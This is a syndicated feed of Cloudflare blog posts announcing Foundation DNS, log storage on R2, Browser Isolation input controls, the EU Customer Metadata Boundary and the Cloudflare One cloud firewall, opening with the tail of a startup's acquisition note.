Back when we were doing Y Combinator in Winter 2020 and realized how much third parties could affect a websites’ performance, we saw a grand mission ahead of us: creating a faster, private, and secure web by reducing the amount of third-party bloat. This mission remained the same to this day. As our conversations with Cloudflare got deeper, we were excited to realize that we’re talking with people who share the same vision. We are thrilled for the opportunity to scale our solutions to millions of websites on the Internet, making them faster and safer and even reducing carbon emissions.

If you would like to explore the free beta version, please click here. If you are an enterprise and have additional/custom requirements, please click here to join the waitlist. To join our Discord channel, click here.

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

Post Syndicated from Hannes Gerhart original https://blog.cloudflare.com/foundation-dns/

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

Today, we’re announcing Foundation DNS, Cloudflare’s new premium DNS offering that provides unparalleled reliability, supreme performance and is able to meet the most complex requirements of infrastructure teams.

Let’s talk money first

When you’re signing an enterprise DNS deal, usually DNS providers request three inputs from you in order to generate a quote:

  • Number of zones
  • Total DNS queries per month
  • Total DNS records across all zones

Some are considerably more complicated and many have pricing calculators or opaque “Contact Us” pricing. Planning a budget around how you may grow brings unnecessary complexity, and we think we can do better. Why not make this even simpler? Here you go: We decided to charge Foundation DNS based on a single input for our enterprise customers: Total DNS queries per month. This way, we expect to save companies money and even more importantly, remove complexity from their DNS bill.

And don’t worry, just like the rest of our products, DDoS mitigation is still unmetered. There won’t be any hidden overage fees in case your nameservers are DDoS’d or the number of DNS queries exceeds your quota for a month or two.

Why is DNS so important?

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

The Domain Name System (DNS) is nearly as old as the Internet itself. It was originally defined in RFC882 and RFC883 in 1983 out of the need to create a mapping between hostnames and IP addresses. Back then, the authors wisely stated: “[The Internet] is a large system and is likely to grow much larger.” [RFC882]. Today there are almost 160 Million domain names just under the .com, one of the largest Top Level Domains (TLD) [source].

By design, DNS is a hierarchical and highly distributed system, but as an end user you usually only communicate with a resolver (1) that is either assigned or operated by your Internet Service Provider (ISP) or directly configured by your employer or yourself. The resolver communicates with one of the root servers (2), the responsible TLD server (3) and the authoritative nameserver (4) of the domain in question. In many cases all of these four parties are operated by a different entity and located in different regions, maybe even continents.

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

As we have seen in the recent past, if your DNS infrastructure goes down you are in serious trouble, and it likely will cost you a lot of money and potentially damage your reputation. So as a domain owner you want that DNS lookups to your domain are answered 100% of the time and ideally as quickly as possible. So what can you do? You cannot influence which resolver your users have configured. You cannot influence the root server. You can choose which TLD server is involved by picking a domain name with the respective TLD. But if you are bound to a certain TLD for other reasons then that is out of your control as well. What you can easily influence is the provider for your authoritative nameservers. So let’s take a closer look at Cloudflare’s authoritative DNS offering.

A look at Cloudflare’s Authoritative DNS

Authoritative DNS is one of our oldest products, and we have spent a lot of time making it great. All DNS queries are answered from our global anycast network with a presence in more than 250 cities. This way we can deliver supreme performance while always guaranteeing global availability. And of course, we leverage our extensive experience in mitigating DDoS attacks to prevent anyone from knocking down our nameservers and with that the domains of our customers.

DNS is critically important to Cloudflare because up until the release of Magic Transit, DNS was how every user on the Internet was directed to Cloudflare to protect and accelerate our customer’s applications. If our DNS answers were slow, Cloudflare was slow. If our DNS answers were unavailable, Cloudflare was unavailable. Speed and reliability of our authoritative DNS is paramount to the speed and reliability of Cloudflare, as it is to our customers. We have also had our customers push our DNS infrastructure as they’ve grown with Cloudflare. Today our largest customer zone has more than 3 million records and the top 5 are reaching almost 10 million records combined. Those customers rely on Cloudflare to push new DNS record updates to our edge in seconds, not minutes. Due to this importance and our customer’s needs, over the years we have grown our dedicated DNS engineering team focused on keeping our DNS stack fast and reliable.

The security of the DNS ecosystem is also important. Cloudflare has always been a proponent of DNSSEC. Signing and validating DNS answers through DNSSEC ensures that an on-path attacker cannot hijack answers and redirect traffic. Cloudflare has always offered DNSSEC for free on all plan levels, and it will continue to be a no charge option for Foundation DNS. For customers who also choose to use Cloudflare as a registrar, simple one-click deployment of DNSSEC is another key feature that ensures our customers’ domains are not hijacked, and their users are protected. We support RFC 8078 for one-click deployment on external registrars as well.

But there are other issues that can bring parts of the Internet to a halt and these are mostly out of our control: route leaks or even worse route hijacking. While DNSSEC can help with mitigating route hijacks, unfortunately not all recursive resolvers will validate DNSSEC. And even if the resolver does validate, a route leak or hijack to your nameservers will still result in downtime. If all your nameserver IPs are affected by such an event, your domain becomes unresolvable.

With many providers each of your nameservers usually resolves to only one IPv4 and one IPv6 address. If that IP address is not reachable — for example because of network congestion or, even worse, a route leak — the entire nameserver becomes unavailable leading to your domain becoming unresolvable. Even worse, some providers even use the same IP subnet for all their nameservers. So if there is an issue with that subnet all nameservers are down.

Let’s take a look at an example:

$ dig aws.com ns +short              
ns-1500.awsdns-59.org.
ns-164.awsdns-20.com.
ns-2028.awsdns-61.co.uk.
ns-917.awsdns-50.net.

$ dig ns-1500.awsdns-59.org. +short
205.251.197.220
$ dig ns-164.awsdns-20.com. +short
205.251.192.164
$ dig ns-2028.awsdns-61.co.uk. +short
205.251.199.236
$ dig ns-917.awsdns-50.net. +short
205.251.195.149

All nameserver IPs are part of 205.251.192.0/21. Thankfully, AWS is now signing their ranges through RPKI and this makes it less likely to leak… provided that the resolver ISP is validating RPKI. But if the resolver ISP does not validate RPKI and should this subnet be leaked or hijacked, resolvers wouldn’t be able to reach any of the nameservers and aws.com would become unresolvable.

It goes without saying that Cloudflare signs all of our routes and are pushing the rest of the Internet to minimize the impact of route leaks, but what else can we do to ensure that our DNS systems remain resilient through route leaks while we wait for RPKI to be ubiquitously deployed?

Today, when you’re using Cloudflare DNS on the Free, Pro, Business or Enterprise plan, your domain gets two nameservers of the structure <name>.ns.cloudflare.com where <name> is a random first name.

$ dig isbgpsafeyet.com ns +short
tom.ns.cloudflare.com.
kami.ns.cloudflare.com.

Now, as we learned before, in order for a domain to be available, its nameservers have to be available. This is why each of these nameservers resolves to 3 anycast IPv4 and 3 anycast IPv6 addresses.

$ dig tom.ns.cloudflare.com a +short
173.245.59.147
108.162.193.147
172.64.33.147

$ dig tom.ns.cloudflare.com aaaa +short
2606:4700:58::adf5:3b93
2803:f800:50::6ca2:c193
2a06:98c1:50::ac40:2193

The essential detail to notice here is that each of the 3 IPv4 and 3 IPv6 addresses is from a different /8 IPv4 (/45 for IPv6) block. So in order for your nameservers to become unavailable via IPv4, the route leak would have to affect exactly the corresponding subnets across all three /8 IPv4 blocks. This type of event, while theoretically is possible, is virtually impossible in practical terms.

How can this be further improved?

Customers using Foundation DNS will be assigned a new set of advanced nameservers hosted on foundationdns.com and foundationdns.net. These nameservers will be even more resilient than the default Cloudflare nameservers. We will be announcing more details about how we’re achieving this early next year, so stay tuned. All external Cloudflare domains (such as cloudflare.com) will transition to these nameservers in the new year.

There is even more

We’re glad to announce that we are launching two highly requested features:

  • Support for outgoing zone transfers for Secondary DNS
  • Logpush for authoritative and secondary DNS queries

Both of them will be available as part of Foundation DNS and to enterprise customers without any additional costs. Let’s take a closer look at each of these and see how they make our DNS offering even better.

Support for outgoing zone transfers for Secondary DNS

What is Secondary DNS, and why is it important? Many large enterprises have requirements to use more than one DNS provider for redundancy in case one provider becomes unavailable. They can achieve this by adding their domain’s DNS records on two independent platforms and manually keeping the zone files in sync — this is referred to as “multi-primary” setup. With Secondary DNS there are two mechanisms how this can be automated using a “primary-secondary” setup:

  • DNS NOTIFY: The primary nameserver notifies the secondary on every change on the zone. Once the secondary receives the NOTIFY, it sends a zone transfer request to the primary to get in sync with it.
  • SOA query: Here, the secondary nameserver regularly queries the SOA record of the zone and checks if the serial number that can be found on the SOA record is the same with the latest serial number the secondary has stored in it’s SOA record of the zone. If there is a new version of the zone available, it sends a zone transfer request to the primary to get those changes.

Alex Fattouche has written a very insightful blog post about how Secondary DNS works behind the scenes if you want to learn more about it. Another flavor of the primary-secondary setup is to hide the primary, thus referred to as “hidden primary”. The difference of this setup is that only the secondary nameservers are authoritative — in other words configured at the domain’s registrar. The diagram below illustrates the different setups.

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

Since 2018, we have been supporting primary-secondary setups where Cloudflare takes the role of the secondary nameserver. This means from our perspective that we are accepting incoming zone transfers from the primary nameservers.

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

Starting today, we are now also supporting outgoing zone transfers, meaning taking the role of the primary nameserver with one or multiple external secondary nameservers receiving zone transfers from Cloudflare. Exactly as for incoming transfers, we are supporting

  • zone transfers via AXFR and IXFR
  • automatic notifications via DNS NOTIFY to trigger zone transfers on every change
  • signed transfers using TSIG to ensure zone files are authenticated during transfer

Logpush for authoritative and secondary DNS

Here at Cloudflare we love logs. In Q3 2021, we processed 28 Million HTTP requests per second and 13.6 Million DNS queries per second on average and blocked 76 Billion threats each day. All these events are stored as logs for a limited time frame in order to provide our users near real-time analytics in the dashboard. For those customers who want to — or have to — permanently store these logs we’ve built Logpush back in 2019. Logpush allows you to stream logs in near real time to one of our analytics partners Microsoft Azure Sentinel, Splunk, Datadog and Sumo Logic or to any cloud storage destination with R2-compatible API.

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

Today, we’re adding one additional data set for Logpush: DNS logs. In order to configure Logpush and stream DNS logs for your domain, just head over to the Cloudflare dashboard, create a new Logpush job, select DNS logs and configure the log fields you’re interested in:

Announcing Foundation DNS — Cloudflare’s new premium DNS offering

Check out our developer documentation for detailed instructions on how to do this through the API and for a thorough description of the new DNS log fields.

One more thing (or two…)

When looking at the entirety of DNS within your infrastructure, it’s important to review how your traffic is flowing through your systems and how that traffic is behaving. At the end of the day, there is only so much processing power, memory, server capacity, and overall compute resources available. One of the best and important tools we have available is Load Balancing and Health Monitoring!

Cloudflare has provided a Load Balancing solution since 2016, supporting customers to leverage their existing resources in a scalable and intelligent manner. But our Load Balancer was limited to A, AAAA, and CNAME records. This covered a lot of major use cases required by customers, but did not cover all of them. Many customers have more needs such as load balancing MX or email server traffic, SRV records to declare which ports and weight that respective traffic should travel across for a specific service, HTTPS records to ensure the respective traffic uses the secure protocol regardless of port and many more. We want to ensure that our customers’ needs are covered and support their ability to align business goals with technical implementation.

We are happy to announce that we have added additional Health Monitoring methods to support Load Balancing MX, SRV, HTTPS and TXT record traffic without any additional configuration necessary. Create your respective DNS records in Cloudflare and set your Load Balancer as the destination…it’s as easy as that! By leveraging ICMP Ping, SMTP, and UDP-ICMP methods, customers will always have a pulse on the health of their servers and be able to apply intelligent steering decisions based on the respective health information.

When thinking about intelligent steering, there is no one size fits all answer. Different businesses have different needs, especially when looking at where your servers are located around the globe, and where your customers are situated. A common rule of thumb to follow is to place servers where your customers are. This ensures they have the most performant and localized experience possible. One common scenario is to steer your traffic based on where your end-user request originates and create a mapping to the server closest to that area. Cloudflare’s geo steering capability allows our customers to do just that — easily create a mapping of regions to pools, ensuring if we see a request originate from Eastern Europe, to send that request to the proper server to suffice that request. But sometimes, regions can be quite large and lend to issues around not being able to tightly couple together that mapping as closely as one might like.

Today, we are very excited to announce country support within our Geo Steering functionality. Now, customers will be able to choose either one of our thirteen regions, or a specific country to map against their pools to give further granularity and control to how customers traffic should behave as it travels through their system. Both country-level steering and our new health monitoring methods to support load balancing more DNS records will be available in January 2022!

Advancing the DNS Ecosystem

Furthermore, we have some other exciting news to share: We’re finishing the work on Multi-Signer DNSSEC (RFC8901) and plan to roll this out in Q1 2022. Why is this important? Two common requirements of large enterprises are:

  • Redundancy: Having multiple DNS providers responding authoritatively for their domains
  • Authenticity: Deploying DNSSEC to ensure DNS responses can be properly authenticated

Both can be achieved by having the primary nameserver sign the domain and transfer its DNS records plus the record signatures to the secondary nameserver which will serve both as is. This setup is supported with Cloudflare Secondary DNS today. What cannot be supported when transferring pre-signed zones are non-standard DNS features like country-level steering. This is where Multi-Signer DNSSEC comes in. Both DNS providers need to know the signing keys of the other provider and perform their own online (or on-the-fly) signing. If you’re curious to learn more about how Multi-Signer DNSSEC works, go check out this excellent blog post published by APNIC.

Last but not least, Cloudflare is joining the DNS Operations, Analysis, and Research Center (DNS-OARC) as a gold member. Together with other researchers and operators of DNS infrastructure we want to tackle the most challenging problems and continuously work on implementing new standards and features.

While we’ve been at DNS since day one of Cloudflare, we’re still just getting started. We know there are more granular and specific features our future customers will ask of us and the launch of Foundation DNS is our stake in the ground that we will continue to invest in all levels of DNS while building the most feature rich enterprise DNS platform on the planet. If you have ideas, let us know what you’ve always dreamed your DNS provider would do. If you want to help build these features, we are hiring.

Store your Cloudflare logs on R2

Post Syndicated from Tanushree Sharma original https://blog.cloudflare.com/store-your-cloudflare-logs-on-r2/

Store your Cloudflare logs on R2

Store your Cloudflare logs on R2

We’re excited to announce that customers will soon be able to store their Cloudflare logs on Cloudflare R2 storage. Storing your logs on Cloudflare will give CIOs and Security Teams an opportunity to consolidate their infrastructure; creating simplicity, savings and additional security.

Cloudflare protects your applications from malicious traffic, speeds up connections, and keeps bad actors out of your network. The logs we produce from our products help customers answer questions like:

  • Why are requests being blocked by the Firewall rules I’ve set up?
  • Why are my users seeing disconnects from my applications that use Spectrum?
  • Why am I seeing a spike in Cloudflare Gateway requests to a specific application?

Storage on R2 adds to our existing suite of logging products. Storing logs on R2 fills in gaps that our customers have been asking for: a cost-effective solution to store logs for any of our products for any period of time.

Goodbye to old school logging

Let’s rewind to the early 2000s. Most organizations were running their own self-managed infrastructure: network devices, firewalls, servers and all the associated software. Each company has to manage logs coming from hundreds of sources in the IT stack. With dedicated storage needed for retaining an endless volume of logs, specialized teams are required to build an ETL pipeline and make the data actionable.

Fast-forward to the 2010s. Organizations are transitioning to using managed services for their IT functions. As a result of this shift, the way that customers collect logs for all their services have changed too. With managed services, much of the logging load is shifted off of the customer.

The challenge now: collecting logs from a combination of managed services, each of which has its own quirks. Logs can be sent at varying latencies, in different formats and some are too detailed while others not detailed enough. To gain a single pane view of their IT infrastructure, companies need to build or buy a SIEM solution.

Cloudflare replaces these sets of managed services. When a customer onboards to Cloudflare, we make it super easy to gain visibility to their traffic that hits our network. We’ve built analytics for many of our products, such as CDN, Firewall, Magic Transit and Spectrum to both view high level trends and dig into patterns by slicing and dicing data.

Analytics are a great way to see data at an aggregate level, but we know that raw logs are important to our customers as well, so we’ve built out a set of logging products.

Logging today

During Speed Week we announced Instant Logs to show customers traffic as it hits their domain. Instant Logs is perfect for live debugging and triaging use cases. Monitor your traffic, make a config change and instantly view its impacts. In cases where you need to retroactively inspect your logs, we have Logpush.

We’ve built an impressive logging pipeline to get data from the 250+ cities that house our data centers to our customers in under a minute using Logpush. If your organization has existing practices for getting data across your stack into one place, we support Logpush to a variety of cloud storage or SIEM destinations. We also have partnerships in place with major SIEM platforms to surface Cloudflare data in ways that are meaningful to our customers.

Last but not least is Logpull. Using Logpull, customers can access HTTP request logs using our REST API. Our customers like Logpull because it’s easy to configure, they don’t have to worry about storing logs on a third party, and you can pull data ad hoc for up to seven days.

Why Cloudflare storage?

The top four requests we’ve heard from customers when it comes to logs are:

  • I have tight budgets and need low cost log storage.
  • They should be low effort to set up and maintain.
  • I should be able to store logs for as long as I need to.
  • I want to access my logs on Cloudflare for any product.

For many of our customers, Cloudflare is one of the most important data sources, and it also generates more data than other applications on their IT stack. R2 is significantly cheaper than other cloud providers, so our customers don’t need to compromise by sampling or leaving out logs from products all together in order to cut down on costs.

Just like the simplicity of Logpull, log storage on R2 will be quick and easy. With a one click setup, we’ll store your logs, and you don’t have to worry about any configuration details. Retention is totally in our customer’s control to match the security and compliance needs of their business. With R2, you can also store your logs for any products we have logging for today (and we’re always adding more as our product line expands).

Log storage; we’re just getting started

With log storage on Cloudflare, we’re creating the building blocks to allow customers to perform log analysis and forensics capabilities directly on Cloudflare. Whether conducting an investigation, responding to a support request or addressing an incident, using analytics for a birds eye view and inspecting logs to determine the root cause is a powerful combination.

If you’re interested in getting notified when you can store your logs on Cloudflare, sign up through this form.

We’re always looking for talented engineers to take on the challenges of working with data at an incredible scale. If you’re interested apply here.

Control input on suspicious sites with Cloudflare Browser Isolation

Post Syndicated from Tim Obezuk original https://blog.cloudflare.com/phishing-protection-browser/

Control input on suspicious sites with Cloudflare Browser Isolation

Control input on suspicious sites with Cloudflare Browser Isolation

Your team can now use Cloudflare’s Browser Isolation service to protect against phishing attacks and credential theft inside the web browser. Users can browse more of the Internet without taking on the risk. Administrators can define Zero Trust policies to prohibit keyboard input and transmitting files during high risk browsing activity.

Earlier this year, Cloudflare Browser Isolation introduced data protection controls that take advantage of the remote browser’s ability to manage all input and outputs between a user and any website. We’re excited to extend that functionality to apply more controls such as prohibiting keyboard input and file uploads to avert phishing attacks and credential theft on high risk and unknown websites.

Challenges defending against unknown threats

Administrators protecting their teams from threats on the open Internet typically implement a Secure Web Gateway (SWG) to filter Internet traffic based on threat intelligence feeds. This is effective at mitigating known threats. In reality, not all websites fit neatly into malicious or non-malicious categories.

For example, a parked domain with typo differences to an established web property could be legitimately registered for an unrelated product or become weaponized as a phishing attack. False-positives are tolerated by risk-averse administrators but come at the cost of employee productivity. Finding the balance between these needs is a fine art, and when applied too aggressively it leads to user frustration and the increased support burden of micromanaging exceptions for blocked traffic.

Legacy secure web gateways are blunt instruments that provide security teams limited options to protect their teams from threats on the Internet. Simply allowing or blocking websites is not enough, and modern security teams need more sophisticated tools to fully protect their teams without compromising on productivity.

Intelligent filtering with Cloudflare Gateway

Cloudflare Gateway provides a secure web gateway to customers wherever their users work. Administrators can build rules that include blocking security risks, scanning for viruses, or restricting browsing based on SSO group identity among other options. User traffic leaves their device and arrives at a Cloudflare data center close to them, providing security and logging without slowing them down.

Unlike the blunt instruments of the past, Cloudflare Gateway applies security policies based on the unique magnitude of data Cloudflare’s network processes. For example, Cloudflare sees just over one trillion DNS queries every day. We use that data to build a comprehensive model of what “good” DNS queries look like — and which DNS queries are anomalous and could represent DNS tunneling for data exfiltration, for example. We use our network to build more intelligent filtering and reduce false positives. You can review that research as well with Cloudflare Radar.

However, we know some customers want to allow users to navigate to destinations in a sort of “neutral” zone. Domains that are newly registered, or newly seen by DNS resolvers, can be the home of a great new service for your team or a surprise attack to steal credentials. Cloudflare works to categorize these as soon as possible, but in those initial minutes users have to request exceptions if your team blocks these categories outright.

Safely browsing the unknown

Cloudflare Browser Isolation shifts the risk of executing untrusted or malicious website code from the user’s endpoint to a remote browser hosted in a low-latency data center. Rather than aggressively blocking unknown websites, and potentially impacting employee productivity, Cloudflare Browser Isolation provides administrators control over how users can interact with risky websites.

Cloudflare’s network intelligence tracks higher risk Internet properties such as Typosquatting and New Domains. Websites in these categories could be benign websites, or phishing attacks waiting to be weaponized. Risk-averse administrators can protect their teams without introducing false-positives by isolating these websites and serving the website in a read-only mode by disabling file uploads, downloads and keyboard input.

Control input on suspicious sites with Cloudflare Browser Isolation

Users are able to safely browse the unknown website without risk of leaking credentials, transmitting files and falling victim to a phishing attack. Should the user have a legitimate reason to interact with an unknown website they are advised to contact their administrator to obtain elevated permissions while browsing the website.

See our developer documentation to learn more about remote browser policies.

Getting started

Cloudflare Browser Isolation is integrated natively into Cloudflare’s Secure Web Gateway and Zero Trust Network Access services, and unlike legacy remote browser isolation solutions does not require IT teams to piece together multiple disparate solutions or force users to change their preferred web browser.

The Zero Trust threat and data protection that Browser Isolation provides make it a natural extension for any company trusting a secure web gateway to protect their business. We’re currently including it with our Cloudflare for Teams Enterprise Plan at no additional charge.1 Get started at our Zero Trust web page.


1. For the first 2,000 seats until 31 Dec 2021

Introducing the Customer Metadata Boundary

Post Syndicated from Jon Levine original https://blog.cloudflare.com/introducing-the-customer-metadata-boundary/

Introducing the Customer Metadata Boundary

Introducing the Customer Metadata Boundary

Data localisation has gotten a lot of attention in recent years because a number of countries see it as a way of controlling or protecting their citizens’ data. Countries such as Australia, China, India, Brazil, and South Korea have or are currently considering regulations that assert legal sovereignty over their citizens’ personal data in some fashion — health care data must be stored locally; public institutions may only contract with local service providers, etc.

In the EU, the recent “Schrems II” decision resulted in additional requirements for companies that transfer personal data outside the EU. And a number of highly regulated industries require that specific types of personal data stay within the EU’s borders.

Cloudflare is committed to helping our customers keep personal data in the EU. Last year, we introduced the Data Localisation Suite, which gives customers control over where their data is inspected and stored.

Today, we’re excited to introduce the Customer Metadata Boundary, which expands the Data Localisation Suite to ensure that a customer’s end user traffic metadata stays in the EU.

Metadata: a primer

“Metadata” can be a scary term, but it’s a simple concept — it just means “data about data.” In other words, it’s a description of activity that happened on our network. Every service on the Internet collects metadata in some form, and it’s vital to user safety and network availability.

At Cloudflare, we collect metadata about the usage of our products for several purposes:

  • Serving analytics via our dashboards and APIs
  • Sharing logs with customers
  • Stopping security threats such as bot or DDoS attacks
  • Improving the performance of our network
  • Maintaining the reliability and resiliency of our network

What does that collection look like in practice at Cloudflare? Our network consists of dozens of services: our Firewall, Cache, DNS Resolver, DDoS protection systems, Workers runtime, and more. Each service emits structured log messages, which contain fields like timestamps, URLs, usage of Cloudflare features, and the identifier of the customer’s account and zone.

These messages do not contain the contents of customer traffic, and so they do not contain things like usernames, passwords, personal information, and other private details of customers’ end users. However, these logs may contain end-user IP addresses, which is considered personal data in the EU.

Data Localisation in the EU

The EU’s General Data Protection Regulation, or GDPR, is one of the world’s most comprehensive (and well known) data privacy laws. The GDPR does not, however, insist that personal data must stay in Europe. Instead, it provides a number of legal mechanisms to ensure that GDPR-level protections are available for EU personal data if it is transferred outside the EU to a third country like the United States. Data transfers from the EU to the US were, until recently, permitted under an agreement called the EU-U.S. Privacy Shield Framework.

Shortly after the GDPR went into effect, a privacy activist named Max Schrems filed suit against Facebook for their data collection practices. In July 2020, the Court of Justice of the EU issued the “Schrems II” ruling — which, among other things, invalidated the Privacy Shield framework. However, the court upheld other valid transfer mechanisms that ensure EU personal data won’t be accessed by U.S. government authorities in a way that violates the GDPR.

Since the Schrems II decision, many customers have asked us how we’re protecting EU citizens’ data. Fortunately, Cloudflare has had data protection safeguards in place since well before the Schrems II case, such as our industry-leading commitments on government data requests. In response to Schrems II in particular, we updated our customer Data Processing Addendum (DPA). We incorporated the latest Standard Contractual Clauses, which are legal agreements approved by the EU Commission that enable data transfer. We also added additional safeguards as outlined in the EDPB’s June 2021 Recommendations on Supplementary Measures. Finally, Cloudflare’s services are certified under the ISO 27701 standard, which maps to the GDPR’s requirements.

In light of these measures, we believe that our EU customers can use Cloudflare’s services in a manner consistent with GDPR and the Schrems II decision. Still, we recognize that many of our customers want their EU personal data to stay in the EU. For example, some of our customers in industries like healthcare, law, and finance may have additional requirements.  For that reason, we have developed an optional suite of services to address those requirements. We call this our Data Localisation Suite.

How the Data Localisation Suite helps today

Data Localisation is challenging for customers because of the volume and variety of data they handle. When it comes to their Cloudflare traffic, we’ve found that customers are primarily concerned about three areas:

  1. How do I ensure my encryption keys stay in the EU?
  2. How can I ensure that services like caching and WAF only run in the EU?
  3. How can ensure that metadata is never transferred outside the EU?

To address the first concern, Cloudflare has long offered Keyless SSL and Geo Key Manager, which ensure that private SSL/TLS key material never leaves the EU. Keyless SSL ensures that Cloudflare never has possession of the private key material at all; Geo Key Manager uses Keyless SSL under the hood to ensure the keys never leave the specified region.

Last year we addressed the second concern with Regional Services, which ensures that Cloudflare will only be able to decrypt and inspect the content of HTTP traffic inside the EU. In other words, SSL connections will only be terminated in Europe, and all of our layer 7 security and performance services will only run in our EU data centers.

Today, we’re enabling customers to address the third and final concern, and keep metadata local as well.

How the Metadata Boundary Works

The Customer Metadata Boundary ensures, simply, that end user traffic metadata that can identify a customer stays in the EU. This includes all the logs and analytics that a customer sees.

How are we able to do this? All the metadata that can identify a customer flows through a single service at our edge, before being forwarded to one of our core data centers.

When the Metadata Boundary is enabled for a customer, our edge ensures that any log message that identifies that customer (that is, contains that customer’s Account ID) is not sent outside the EU. It will only be sent to our core data center in the EU, and not our core data center in the US.

Introducing the Customer Metadata Boundary

What’s next

Today our Data Localisation Suite is focused on helping our customers in the EU localise data for their inbound HTTP traffic. This includes our Cache, Firewall, DDoS protection, and Bot Management products.

We’ve heard from customers that they want data localisation for more products and more regions. This means making all of our Data Localisation Products, including Geo Key Manager and Regional Services, work globally. We’re also working on expanding the Metadata Boundary to include our Zero Trust products like Cloudflare for Teams. Stay tuned!

Replace your hardware firewalls with Cloudflare One

Post Syndicated from Ankur Aggarwal original https://blog.cloudflare.com/replace-your-hardware-firewalls-with-cloudflare-one/

Replace your hardware firewalls with Cloudflare One

Replace your hardware firewalls with Cloudflare One

Today, we’re excited to announce new capabilities to help customers make the switch from hardware firewall appliances to a true cloud-native firewall built for next-generation networks. Cloudflare One provides a secure, performant, and Zero Trust-enabled platform for administrators to apply consistent security policies across all of their users and resources. Best of all, it’s built on top of our global network, so you never need to worry about scaling, deploying, or maintaining your edge security hardware.

As part of this announcement, Cloudflare launched the Oahu program today to help customers leave legacy hardware behind; in this post we’ll break down the new capabilities that solve the problems of previous firewall generations and save IT teams time and money.

How did we get here?

In order to understand where we are today, it’ll be helpful to start with a brief history of IP firewalls.

Stateless packet filtering for private networks

The first generation of network firewalls were designed mostly to meet the security requirements of private networks, which started with the castle and moat architecture we defined as Generation 1 in our post yesterday. Firewall administrators could build policies around signals available at layers 3 and 4 of the OSI model (primarily IPs and ports), which was perfect for (e.g.) enabling a group of employees on one floor of an office building to access servers on another via a LAN.

This packet filtering capability was sufficient until networks got more complicated, including by connecting to the Internet. IT teams began needing to protect their corporate network from bad actors on the outside, which required more sophisticated policies.

Better protection with stateful & deep packet inspection

Firewall hardware evolved to include stateful packet inspection and the beginnings of deep packet inspection, extending basic firewall concepts by tracking the state of connections passing through them. This enabled administrators to (e.g.) block all incoming packets not tied to an already present outgoing connection.

These new capabilities provided more sophisticated protection from attackers. But the advancement came at a cost: supporting this higher level of security required more compute and memory resources. These requirements meant that security and network teams had to get better at planning the capacity they’d need for each new appliance and make tradeoffs between cost and redundancy for their network.

In addition to cost tradeoffs, these new firewalls only provided some insight into how the network was used. You could tell users were accessing 198.51.100.10 on port 80, but to do a further investigation about what these users were accessing would require you to do a reverse lookup of the IP address. That alone would only land you at the front page of the provider, with no insight into what was accessed, reputation of the domain/host, or any other information to help answer “Is this a security event I need to investigate further?”. Determining the source would be difficult here as well, it would require correlating a private IP address handed out via DHCP with a device and then subsequently a user (if you remembered to set long lease times and never shared devices).

Application awareness with next generation firewalls

To accommodate these challenges, the industry introduced the Next Generation Firewall (NGFW). These were the long reigning, and in some cases are still the industry standard, corporate edge security device. They adopted all the capabilities of previous generations while adding in application awareness to help administrators gain more control over what passed through their security perimeter. NGFWs introduced the concept of vendor-provided or externally-provided application intelligence, the ability to identify individual applications from traffic characteristics. Intelligence which could then be fed into policies defining what users could and couldn’t do with a given application.

As more applications moved to the cloud, NGFW vendors started to provide virtualized versions of their appliances. These allowed administrators to no longer worry about lead times for the next hardware version and allowed greater flexibility when deploying to multiple locations.

Over the years, as the threat landscape continued to evolve and networks became more complex, NGFWs started to build in additional security capabilities, some of which helped consolidate multiple appliances. Depending on the vendor, these included VPN Gateways, IDS/IPS, Web Application Firewalls, and even things like Bot Management and DDoS protection. But even with these features, NGFWs had their drawbacks — administrators still needed to spend time designing and configuring redundant (at least primary/secondary) appliances, as well as choosing which locations had firewalls and incurring performance penalties from backhauling traffic there from other locations. And even still, careful IP address management was required when creating policies to apply pseudo identity.

Adding user-level controls to move toward Zero Trust

As firewall vendors added more sophisticated controls, in parallel, a paradigm shift for network architecture was introduced to address the security concerns introduced as applications and users left the organization’s “castle” for the Internet. Zero Trust security means that no one is trusted by default from inside or outside the network, and verification is required from everyone trying to gain access to resources on the network. Firewalls started incorporating Zero Trust principles by integrating with identity providers (IdPs) and allowing users to build policies around user groups — “only Finance and HR can access payroll systems” — enabling finer-grained control and reducing the need to rely on IP addresses to approximate identity.

These policies have helped organizations lock down their networks and get closer to Zero Trust, but CIOs are still left with problems: what happens when they need to integrate another organization’s identity provider? How do they safely grant access to corporate resources for contractors? And these new controls don’t address the fundamental problems with managing hardware, which still exist and are getting more complex as companies go through business changes like adding and removing locations or embracing hybrid forms of work. CIOs need a solution that works for the future of corporate networks, instead of trying to duct tape together solutions that address only some aspects of what they need.

The cloud-native firewall for next-generation networks

Cloudflare is helping customers build the future of their corporate networks by unifying network connectivity and Zero Trust security. Customers who adopt the Cloudflare One platform can deprecate their hardware firewalls in favor of a cloud-native approach, making IT teams’ lives easier by solving the problems of previous generations.

Connect any source or destination with flexible on-ramps

Rather than managing different devices for different use cases, all traffic across your network — from data centers, offices, cloud properties, and user devices — should be able to flow through a single global firewall. Cloudflare One enables you to connect to the Cloudflare network with a variety of flexible on-ramp methods including network-layer (GRE or IPsec tunnels) or application-layer tunnels, direct connections, BYOIP, and a device client. Connectivity to Cloudflare means access to our entire global network, which eliminates many of the challenges with physical or virtualized hardware:

  • No more capacity planning: The capacity of your firewall is the capacity of Cloudflare’s global network (currently >100Tbps and growing).
  • No more location planning: Cloudflare’s Anycast network architecture enables traffic to connect automatically to the closest location to its source. No more picking regions or worrying about where your primary/backup appliances are — redundancy and failover are built in by default.
  • No maintenance downtimes: Improvements to Cloudflare’s firewall capabilities, like all of our products, are deployed continuously across our global edge.
  • DDoS protection built in: No need to worry about DoS attacks overwhelming your firewalls; Cloudflare’s network automatically blocks attacks close to their source and sends only the clean traffic on to its destination.

Configure comprehensive policies, from packet filtering to Zero Trust

Cloudflare One policies can be used to secure and route your organizations traffic across all the various traffic ramps. These policies can be crafted using all the same attributes available through a traditional NGFW while expanding to include Zero Trust attributes as well. These Zero Trust attributes can include one or more IdPs or endpoint security providers.

When looking strictly at layers 3 through 5 of the OSI model, policies can be based on IP, port, protocol, and other attributes in both a stateless and stateful manner. These attributes can also be used to build your private network on Cloudflare when used in conjunction with any of the identity attributes and the Cloudflare device client.

